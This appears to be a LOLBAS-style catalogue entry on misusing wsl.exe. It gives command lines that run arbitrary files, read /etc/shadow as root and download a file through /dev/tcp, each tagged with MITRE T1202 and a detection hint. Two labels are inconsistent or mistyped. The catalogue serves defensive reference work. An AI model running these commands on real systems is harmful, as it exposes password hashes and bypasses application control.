.. / Wsl.exe
Star

Windows subsystem for Linux executable


Paths:


Resources:
https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules

Acknowledgement:
Alex Ionescu - @aionescu
Matt - @NotoriousRebel1
Asif Matadar - @d1r4c


Detection:
Child process from wsl.exe



Execute

Executes calc.exe from wsl.exe
wsl.exe -e /mnt/c/Windows/System32/calc.exe
Usecase:Performs execution of specified file, can be used to execute arbitrary Linux commands.
Privileges required:User
OS:Windows 10, Windows 19 Server
Mitre:T1202



Cats /etc/shadow file as root
wsl.exe -u root -e cat /etc/shadow
Usecase:Performs execution of arbitrary Linux commands as root without need for password.
Privileges required:User
OS:Windows 10, Windows 19 Server
Mitre:T1202



Cats /etc/shadow file as root
wsl.exe --exec bash -c 'cat file'
Usecase:Performs execution of arbitrary Linux commands.
Privileges required:User
OS:Windows 10, Windows 19 Server
Mitre:T1202



Download

Downloads file from 192.168.1.10
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Usecase:Download file
Privileges required:User
OS:Windows 10, Windows 19 Server
Mitre:T1202